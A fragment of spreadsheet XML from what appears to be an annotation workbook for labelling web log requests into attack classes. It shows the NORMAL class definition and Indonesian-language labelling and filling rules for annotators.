      <c r="B10" s="2" t="inlineStr">
        <is>
          <t>NORMAL</t>
        </is>
      </c>
      <c r="C10" s="2" t="inlineStr">
        <is>
          <t>Legitimate user or search-engine crawler request</t>
        </is>
      </c>
      <c r="D10" s="2" t="inlineStr">
        <is>
          <t>Ordinary URI, alphanumeric parameters, status 200/301/304, browser or verified bot user agent</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="2" t="inlineStr"/>
    </row>
    <row r="12">
      <c r="A12" s="2" t="inlineStr">
        <is>
          <t>Aturan pelabelan</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="2" t="inlineStr">
        <is>
          <t>1. Beri label hanya dari apa yang terlihat di baris.</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="2" t="inlineStr">
        <is>
          <t>2. Bila ragu antara serangan dan NORMAL, pilih NORMAL.</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="2" t="inlineStr">
        <is>
          <t>3. Bila ragu antara dua kelas serangan, pilih yang payload-nya paling eksplisit.</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="inlineStr"/>
    </row>
    <row r="17">
      <c r="A17" s="2" t="inlineStr">
        <is>
          <t>Cara mengisi</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="2" t="inlineStr">
        <is>
          <t>- Pilih satu kelas di kolom label_anotator untuk setiap baris (dropdown). Kolom catatan boleh dikosongkan.</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="2" t="inlineStr">
        <is>
          <t>- Jangan mengubah kolom lain dan jangan menghapus baris; mengurutkan ulang baris boleh.</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="2" t="inlineStr">
        <is>
          <t>- Kerjakan sendiri tanpa berdiskusi dengan anotator lain dan tanpa melihat label dataset atau keluaran model sampai kedua berkas selesai.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2026-10-13T07:26:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-13T07:26:44Z</dcterms:modified>
</cp:coreProperties>
</file>